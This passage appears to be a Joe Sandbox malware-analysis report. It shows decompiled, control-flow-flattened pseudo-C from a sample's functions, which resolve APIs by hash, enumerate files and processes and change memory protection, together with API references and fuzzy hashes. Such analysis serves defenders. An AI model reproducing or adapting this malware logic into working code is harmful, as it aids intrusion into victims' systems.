									_t274 =  *0x29cdc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E029C3E80(_t191, E029C3F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x29cdc60 = _t274;
									}
									_t243 =  *( *0x29ce2e0 + 0xc);
									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E029C3460(_t266);
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_v2848 = ( *( *0x29ce2e0 + 0xc))[4] & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E029C42F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E029C5BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t139 =  *0x29cdea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E029C3E80(_t191, E029C3F20(0xbb398380), 0x97f883e, _t278);
									 *0x29cdea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x29ce1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E029C3E80(_t191, E029C3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x29ce1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E029C4250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E029C2290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E029C1C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E029C2C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x029c12b0
0x029c12b8
0x029c12c0
0x029c12c2
0x029c12c6
0x029c12c8
0x029c12cc
0x029c12d0
0x029c12d5
0x029c12d9
0x029c12dd
0x029c12e1
0x029c12e1
0x029c12e1
0x029c12e8
0x029c12f0
0x029c12f0
0x029c12f0
0x029c12f0
0x029c12f5
0x00000000
0x00000000
0x029c12fb
0x029c1589
0x029c158e
0x029c1590
0x029c15a3
0x029c15a8
0x029c15a8
0x029c15af
0x029c15b1
0x029c15b6
0x029c15b8
0x029c15cb
0x029c15d0
0x029c15d0
0x029c15dc
0x029c15de
0x029c15e2
0x029c15e7
0x00000000
0x029c1301
0x029c1301
0x029c1306
0x029c148e
0x029c1493
0x029c1556
0x029c155b
0x00000000
0x029c1561
0x029c1569
0x029c156e
0x029c1574
0x029c1578
0x029c157f
0x00000000
0x029c157f
0x029c1499
0x029c1499
0x029c14e6
0x029c14fe
0x029c14fe
0x029c14ff
0x029c1510
0x029c151d
0x029c1523
0x029c1528
0x029c152b
0x029c152e
0x029c1531
0x029c1534
0x029c1534
0x029c1534
0x029c1537
0x029c153b
0x029c153b
0x029c153f
0x029c1545
0x029c1548
0x029c154d
0x00000000
0x029c149b
0x029c149b
0x029c14a0
0x029c14cb
0x029c14d0
0x029c14d4
0x029c14d9
0x00000000
0x029c14a2
0x029c14a2
0x029c14a7
0x029c1879
0x029c187b
0x029c1880
0x029c188e
0x00000000
0x00000000
0x00000000
0x029c14a7
0x029c14a0
0x029c1499
0x029c130c
0x029c130c
0x029c1452
0x029c1457
0x029c1459
0x029c146c
0x029c1471
0x029c1471
0x029c1476
0x029c1478
0x029c147c
0x029c1480
0x029c1484
0x00000000
0x029c1312
0x029c1312
0x029c1317
0x029c1414
0x029c1419
0x00000000
0x029c141f
0x029c142f
0x029c1434
0x029c1438
0x029c143b
0x029c1441
0x029c1448
0x00000000
0x029c1448
0x029c131d
0x029c131d
0x029c13b5
0x029c13b7
0x029c13bc
0x029c13be
0x029c13d1
0x029c13d6
0x029c13d6
0x029c13f6
0x029c13f8
0x029c13fd
0x029c1402
0x029c1406
0x029c140b
0x00000000
0x029c1323
0x029c1328
0x029c1394
0x029c1399
0x029c139d
0x029c13a2
0x00000000
0x029c132a
0x029c132f
0x00000000
0x029c1335
0x029c133b
0x029c1343
0x029c1345
0x029c1349
0x029c1353
0x029c135c
0x029c135d
0x029c1364
0x029c1369
0x029c136d
0x029c1371
0x029c1375
0x029c1375
0x029c137a
0x029c137a
0x029c137e
0x029c1382
0x029c1387
0x00000000
0x029c1387
0x029c132f
0x029c1328
0x029c131d
0x029c1317
0x029c130c
0x029c1306
0x00000000
0x029c12fb
0x029c15f0
0x029c15f5
0x029c174c
0x029c1751
0x029c1845
0x029c184d
0x029c1855
0x029c1859
0x029c185e
0x029c1864
0x029c1868
0x029c186f
0x00000000
0x029c1757
0x029c1757
0x029c175c
0x029c17c0
0x029c17c5
0x029c17cb
0x029c17cd
0x029c17cf
0x029c17e7
0x029c17e9
0x029c17e9
0x029c17f5
0x029c1813
0x029c1815
0x029c181a
0x029c1824
0x029c1828
0x029c182c
0x029c1837
0x029c183b
0x00000000
0x029c175e
0x029c175e
0x029c1763
0x00000000
0x029c1769
0x029c1779
0x029c1782
0x029c1784
0x029c1788
0x029c178a
0x00000000
0x029c1790
0x029c1795
0x029c1796
0x029c179c
0x029c179e
0x029c17a1
0x029c17a5
0x029c17a7
0x00000000
0x029c17ad
0x029c17ad
0x029c17b1
0x00000000
0x029c17b1
0x029c17a7
0x029c178a
0x029c1763
0x029c175c
0x029c15fb
0x029c15fb
0x029c16e5
0x029c16ea
0x029c16ec
0x029c16ff
0x029c1704
0x029c1704
0x029c170b
0x029c170d
0x029c1712
0x029c1714
0x029c1727
0x029c172c
0x029c172c
0x029c1738
0x029c173a
0x029c173e
0x029c1743
0x00000000
0x029c1601
0x029c1601
0x029c1606
0x029c16bf
0x029c16c4
0x00000000
0x029c16ca
0x029c16ce
0x029c16d3
0x029c16d7
0x029c16dc
0x00000000
0x029c16dc
0x029c160c
0x029c160c
0x029c169f
0x029c16a4
0x029c16aa
0x029c16ae
0x029c16b5
0x00000000
0x029c1612
0x029c1612
0x029c1617
0x029c1680
0x029c1685
0x029c1689
0x029c168e
0x00000000
0x029c1619
0x029c1619
0x029c161e
0x00000000
0x029c1624
0x029c162c
0x029c1631
0x029c1639
0x029c1641
0x029c1649
0x029c1651
0x029c1656
0x029c165b
0x029c165f
0x029c1662
0x029c1668
0x029c166f
0x00000000
0x029c166f
0x029c161e
0x029c1617
0x029c160c
0x029c1606
0x029c15fb
0x00000000
0x029c14ad
0x029c14ad
0x029c14ad
0x029c14c6
0x00000000
0x029c14c6

Strings

Ei, xrefs: 029C17D1
a7a&, xrefs: 029C1548
a7a&, xrefs: 029C1612
Ei, xrefs: 029C13C0
E?*, xrefs: 029C1601

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: E?*$a7a&$a7a&$Ei$Ei
API String ID: 0-288907479
Opcode ID: e312ad97162a13b67de295143c9273039e8b0b7457ee40dac7ee7f25c5e923e4
Instruction ID: d54c35b86864b7e9fb98b0e901da364f6ba0d9ede6369f56a821da963c493dd6
Opcode Fuzzy Hash: e312ad97162a13b67de295143c9273039e8b0b7457ee40dac7ee7f25c5e923e4
Instruction Fuzzy Hash: 2EE18E756083418BC718DF68D890A6FB3E6ABC4344F244D2DE49ADB345DB34E905CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 029421A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 029421F9
SetLastError.KERNEL32(0000007E), ref: 0294223B

Memory Dump Source

Source File: 00000000.00000002.249702328.0000000002941000.00000020.00000001.sdmp, Offset: 02941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2941000_0TOEtGJHN8.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: c704b48e46b9cb7bbe9b0c61459b17a81749d22795537ea730ecbcbea2c26646
Instruction ID: 6ddd6379c44722d255fa4d23d36552ade7e273900f868946cc8ba5e1d6104d3f
Opcode Fuzzy Hash: c704b48e46b9cb7bbe9b0c61459b17a81749d22795537ea730ecbcbea2c26646
Instruction Fuzzy Hash: 6781A875E04209EFDB04CF94C994FADBBB5FF88314F248598E909AB355D734AA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02942430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02942468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 029424B2

Strings

@, xrefs: 02942453

Memory Dump Source

Source File: 00000000.00000002.249702328.0000000002941000.00000020.00000001.sdmp, Offset: 02941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2941000_0TOEtGJHN8.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 88c501477ee25790530bae9b1c0687792bc0c300c85a5bc2c2425fd64c7fb16e
Instruction ID: 90d7664cf5354cffa8ad4d70d66ff2f45f9b2aa5a7fc01ff68c6ff734998603b
Opcode Fuzzy Hash: 88c501477ee25790530bae9b1c0687792bc0c300c85a5bc2c2425fd64c7fb16e
Instruction Fuzzy Hash: 4B21D5B4E04209EFDB14CF99C980FADBBB5FF44304F608599E909AB240DB74AA80DB55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mfnetsrc.exe PID: 5116 Parent PID: 360 mfnetsrc.exeCOMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	97.9%
Signature Coverage:	8.1%
Total number of Nodes:	479
Total number of Limit Nodes:	51

Executed Functions

Function 02A31030, Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(02A34054,02A34040), ref: 02A31047
GetProcAddress.KERNEL32(00000000), ref: 02A3104E

Part of subcall function 02A31B30: SetLastError.KERNEL32(0000000D,?,02A31070,?,00000040), ref: 02A31B3D

SetLastError.KERNEL32(000000C1), ref: 02A31096

Memory Dump Source

Source File: 00000003.00000002.642765849.0000000002A31000.00000020.00000001.sdmp, Offset: 02A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a31000_mfnetsrc.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 84f19c39bbe746c6b08dd382a6062cdf4b9522ea7b5e0d5d43e8d237a5ac2003
Instruction ID: 29288cdb56fa8fedd9decc44afd7d6e7d2e5e783dff5dcfae0af313afc344aa5
Opcode Fuzzy Hash: 84f19c39bbe746c6b08dd382a6062cdf4b9522ea7b5e0d5d43e8d237a5ac2003
Instruction Fuzzy Hash: 65F1C4B5E00209EFDB05CF94D984BAEB7B1BF48314F208598E919AB351DB35EA51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02AA38F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E02AA38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E02AA34C0(0x2aad260);
											_t28 =  *0x2aadc60;
											if(_t28 == 0) {
												_t28 = E02AA3E80(_t58, E02AA3F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x2aadc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
											E02AA38F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E02AA3460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x2aae004 == 0) {
							 *0x2aae004 = E02AA3E80(_t58, E02AA3F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E02AA34C0(0x2aad240);
							_t39 =  *0x2aadc60;
							if(_t39 == 0) {
								_t39 = E02AA3E80(_t58, E02AA3F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x2aadc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x2aadea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E02AA3E80(_t58, E02AA3F20(0xbb398380), 0x97f883e, _t97);
								 *0x2aadea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x2aae1a0;
							if(_t43 == 0) {
								_t43 = E02AA3E80(_t58, E02AA3F20(0xbb398380), 0x26c3f343, _t97);
								 *0x2aae1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x2aadfd4 == 0) {
									 *0x2aadfd4 = E02AA3E80(_t58, E02AA3F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x2aae064 == 0) {
										 *0x2aae064 = E02AA3E80(_t58, E02AA3F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x02aa38fa
0x02aa38fc
0x02aa38fe
0x02aa3902
0x02aa3907
0x02aa390b
0x02aa3910
0x02aa3910
0x02aa3910
0x02aa3910
0x02aa3915
0x00000000
0x00000000
0x02aa3a79
0x02aa3b62
0x00000000
0x02aa3a7f
0x02aa3a84
0x00000000
0x02aa3a8a
0x02aa3a8f
0x02aa3b48
0x02aa3b51
0x02aa3b58
0x02aa3a95
0x02aa3a9b
0x02aa3abf
0x02aa3ac1
0x00000000
0x02aa3ac3
0x02aa3acd
0x02aa3acf
0x02aa3ad6
0x02aa3ae9
0x02aa3aee
0x02aa3aee
0x02aa3b07
0x02aa3b23
0x02aa3b28
0x02aa3b2d
0x02aa3b32
0x02aa3b32
0x02aa3a9d
0x02aa3a9d
0x02aa3aa5
0x02aa3ab5
0x02aa3ab5
0x00000000
0x00000000
0x00000000
0x02aa3aa5
0x02aa3a9b
0x00000000
0x02aa3a8f
0x02aa3a84
0x00000000
0x02aa3a79
0x02aa391b
0x02aa3a33
0x02aa3a4b
0x02aa3a4b
0x02aa3a5d
0x02aa3a5f
0x02aa3a64
0x02aa3b9d
0x02aa3a6a
0x02aa3a6a
0x00000000
0x02aa3a6a
0x02aa3921
0x02aa3926
0x02aa3992
0x02aa3994
0x02aa399b
0x02aa39ae
0x02aa39b3
0x02aa39b3
0x02aa39c7
0x02aa39c9
0x02aa39ce
0x02aa39d3
0x02aa39e6
0x02aa39eb
0x02aa39eb
0x02aa39f2
0x02aa39f4
0x02aa39fb
0x02aa3a0e
0x02aa3a13
0x02aa3a13
0x02aa3a1c
0x02aa3a1e
0x02aa3a22
0x00000000
0x02aa3928
0x02aa392d
0x02aa3953
0x02aa396b
0x02aa396b
0x02aa3976
0x02aa397a
0x02aa3981
0x00000000
0x02aa392f
0x02aa3934
0x02aa3b73
0x02aa3b8b
0x02aa3b8b
0x02aa3b91
0x00000000
0x02aa3b91
0x00000000
0x02aa3934
0x02aa392d
0x02aa3926
0x00000000
0x02aa393a
0x02aa393a
0x02aa394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,02AA998D,16BF64F2,00000001), ref: 02AA3976
FindFirstFileW.KERNELBASE(?,?,00000000,02AA998D,16BF64F2,00000001), ref: 02AA3A5D
FindClose.KERNELBASE(?,00000000,02AA998D,16BF64F2,00000001), ref: 02AA3B91

Strings

Ei, xrefs: 02AA3AD8
8T], xrefs: 02AA3910
8T], xrefs: 02AA3A22
Ei, xrefs: 02AA399D
., xrefs: 02AA3A95

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: a48c7b4cf694d1e32c4628b8c7278f3181016ce908d5fc0a8ee9cbc9df4fa9ab
Instruction ID: 2b5a844d703183efcde2c004f22964996774d4e03025e8892e85ca2b3060975f
Opcode Fuzzy Hash: a48c7b4cf694d1e32c4628b8c7278f3181016ce908d5fc0a8ee9cbc9df4fa9ab
Instruction Fuzzy Hash: 1251FA71B8420157CF24ABB499B467FB6E6AFC0344F4049AEF946C7340EF76C8158B92

Uniqueness

Uniqueness Score: -1.00%

Function 02AA4CB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E02AA4CB0(intOrPtr* __ecx, void* __edx) {
				void* _v556;
				void* _v560;
				void* __ebx;
				void* _t5;
				signed int _t7;
				int _t13;
				signed int _t17;
				void* _t24;
				intOrPtr* _t27;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t47;

				_t44 = _v560;
				_t27 = __ecx;
				_t43 = __edx;
				_t5 = 0x166df8ad;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t5 - 0x31709247;
						if(_t47 > 0) {
							break;
						}
						if(_t47 == 0) {
							_t17 =  *_t27( &_v556, _t43);
							asm("sbb eax, eax");
							_t5 = ( ~_t17 & 0xfe0bf6b3) + 0x395ce26e;
							continue;
						} else {
							if(_t5 == 0x1c199) {
								_v556 = 0x22c;
								if( *0x2aadeb4 == 0) {
									 *0x2aadeb4 = E02AA3E80(_t27, E02AA3F20(0xbb398380), 0x6e59538e, _t45);
								}
								L13:
								_t7 = Process32NextW(_t44,  &_v556); // executed
								asm("sbb eax, eax");
								_t5 = ( ~_t7 & 0xf813afd9) + 0x395ce26e;
								continue;
							} else {
								if(_t5 == 0x71faaa2) {
									if( *0x2aadbd8 == 0) {
										 *0x2aadbd8 = E02AA3E80(_t27, E02AA3F20(0xbb398380), 0xc9ddf643, _t45);
									}
									_t24 = CreateToolhelp32Snapshot(2, 0); // executed
									_t44 = _t24;
									if(_t44 == 0xffffffff) {
										return _t24;
									} else {
										_t5 = 0x1c199;
										continue;
									}
								} else {
									if(_t5 != 0x166df8ad) {
										goto L17;
									} else {
										_t5 = 0x71faaa2;
										continue;
									}
								}
							}
						}
						L25:
					}
					if(_t5 == 0x3768d921) {
						if( *0x2aadecc == 0) {
							 *0x2aadecc = E02AA3E80(_t27, E02AA3F20(0xbb398380), 0xc021696d, _t45);
						}
						goto L13;
					} else {
						if(_t5 == 0x395ce26e) {
							if( *0x2aadc70 == 0) {
								 *0x2aadc70 = E02AA3E80(_t27, E02AA3F20(0xbb398380), 0x560d239b, _t45);
							}
							_t13 = FindCloseChangeNotification(_t44); // executed
							return _t13;
						}
						goto L17;
					}
					goto L25;
					L17:
				} while (_t5 != 0x3925027b);
				return _t5;
				goto L25;
			}

0x02aa4cb8
0x02aa4cbc
0x02aa4cbf
0x02aa4cc1
0x02aa4cc6
0x02aa4cd0
0x02aa4cd0
0x02aa4cd0
0x02aa4cd0
0x02aa4cd5
0x00000000
0x00000000
0x02aa4cdb
0x02aa4d8a
0x02aa4d8e
0x02aa4d95
0x00000000
0x02aa4ce1
0x02aa4ce6
0x02aa4d42
0x02aa4d4c
0x02aa4d64
0x02aa4d64
0x02aa4d69
0x02aa4d6f
0x02aa4d73
0x02aa4d7a
0x00000000
0x02aa4ce8
0x02aa4ced
0x02aa4d08
0x02aa4d20
0x02aa4d20
0x02aa4d29
0x02aa4d2b
0x02aa4d30
0x02aa4e18
0x02aa4d36
0x02aa4d36
0x00000000
0x02aa4d36
0x02aa4cef
0x02aa4cf4
0x00000000
0x02aa4cfa
0x02aa4cfa
0x00000000
0x02aa4cfa
0x02aa4cf4
0x02aa4ced
0x02aa4ce6
0x00000000
0x02aa4cdb
0x02aa4da4
0x02aa4dc9
0x02aa4de1
0x02aa4de1
0x00000000
0x02aa4da6
0x02aa4dab
0x02aa4def
0x02aa4e07
0x02aa4e07
0x02aa4e0d
0x00000000
0x02aa4e0d
0x00000000
0x02aa4dab
0x00000000
0x02aa4dad
0x02aa4dad
0x02aa4dc1
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02AA4D29
Process32NextW.KERNEL32(00000000,?,?,00000000,?), ref: 02AA4D6F
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?), ref: 02AA4E0D

Strings

n\9, xrefs: 02AA4DA6

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindNextNotificationProcess32SnapshotToolhelp32
String ID: n\9
API String ID: 1306606082-3894687320
Opcode ID: aa745aa0c7597851e9ae599e3a83b4be618fc6adb07a9765dee097819867bfb4
Instruction ID: 24026a3949f5b1ee50ef6563033f9f89545e40aa7fd8ecd8a4c574bd6e726e43
Opcode Fuzzy Hash: aa745aa0c7597851e9ae599e3a83b4be618fc6adb07a9765dee097819867bfb4
Instruction Fuzzy Hash: 53310971780702A79B245BB9A4B467E61EA5F88308F04092BF455CB640EFE8CC554BD1

Uniqueness

Uniqueness Score: -1.00%

Function 02AA2290, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E02AA2290(signed int* __ecx, signed int* __edx) {
				char _v25;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				signed int* _v132;
				signed int* _v136;
				signed int* _v140;
				signed int* _v144;
				signed int* _v148;
				signed int* _v152;
				signed int* _v156;
				signed int* _v160;
				signed int* _v164;
				void* __ebx;
				void* __ebp;
				signed int* _t61;
				intOrPtr _t63;
				signed int _t69;
				intOrPtr _t72;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				void* _t89;
				intOrPtr _t92;
				signed int _t93;
				signed int _t98;
				signed int _t105;
				signed int _t107;
				signed int _t112;
				signed int* _t113;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t121;
				signed int* _t140;
				signed int _t143;
				signed int _t148;
				void* _t149;
				signed int _t150;
				signed int _t151;
				long _t152;
				signed int _t153;
				signed int _t156;
				signed int** _t158;
				void* _t160;
				void* _t161;

				_t158 =  &_v140;
				_t105 = _v120;
				_t156 = _v120;
				_v132 = __edx;
				_t151 = 0x3b18423d;
				_v136 = __ecx;
				_v128 = 0;
				while(1) {
					L1:
					_t61 = _v140;
					do {
						while(1) {
							L2:
							_t160 = _t151 - 0x1c8b703e;
							if(_t160 > 0) {
								break;
							}
							if(_t160 == 0) {
								_t107 =  *0x2aadef8;
								__eflags = _t107;
								if(_t107 == 0) {
									_t107 = E02AA3E80(_t105, E02AA3F20(0x667fdee), 0xb11f83b0, _t156);
									 *0x2aadef8 = _t107;
								}
								_t63 =  *0x2aae2e4; // 0xdf3588
								 *_t107( *((intOrPtr*)(_t63 + 0x18)), 0, 0,  &_v124);
								asm("sbb esi, esi");
								_t151 = (_t151 & 0x258fd75b) + 0x8cf6762;
								while(1) {
									L1:
									_t61 = _v140;
									goto L2;
								}
							} else {
								_t161 = _t151 - 0x13859baf;
								if(_t161 > 0) {
									__eflags = _t151 - 0x14926a00;
									if(_t151 != 0x14926a00) {
										goto L8;
									} else {
										_t69 =  *0x2aae168;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E02AA3E80(_t105, E02AA3F20(0x667fdee), 0xae646c41, _t156);
											 *0x2aae168 = _t69;
										}
										 *_t69(_v124);
										_t151 = 0x8cf6762;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									if(_t161 == 0) {
										_t112 =  *0x2aade98;
										__eflags = _t112;
										if(_t112 == 0) {
											_t112 = E02AA3E80(_t105, E02AA3F20(0x667fdee), 0xe5edfdec, _t156);
											_t61 = _v140;
											 *0x2aade98 = _t112;
										}
										_t72 =  *0x2aae2e4; // 0xdf3588
										 *_t112( *((intOrPtr*)(_t72 + 0x20)), _v124, 1, 0, _t61,  &_v120, _t156);
										_t113 = _v164;
										_t140 = _v160;
										asm("sbb esi, esi");
										_t151 = (_t151 & 0x0b40c3ab) + 0x14926a00;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									} else {
										if(_t151 == 0x3028e43) {
											_t114 =  *0x2aae060;
											_v112 = 0x14;
											__eflags = _t114;
											if(_t114 == 0) {
												_t114 = E02AA3E80(_t105, E02AA3F20(0x667fdee), 0xe39c7ccc, _t156);
												 *0x2aae060 = _t114;
											}
											_t79 =  *_t114(_v124, 2, _t105 + 0x60,  &_v112, 0);
											_t113 = _v156;
											__eflags = _t79;
											_t61 = _v160;
											_t140 = _v152;
											if(_t79 != 0) {
												_t151 = 0x14926a00;
												_v148 = 1;
												while(1) {
													L1:
													_t61 = _v140;
													goto L2;
												}
											}
											continue;
										} else {
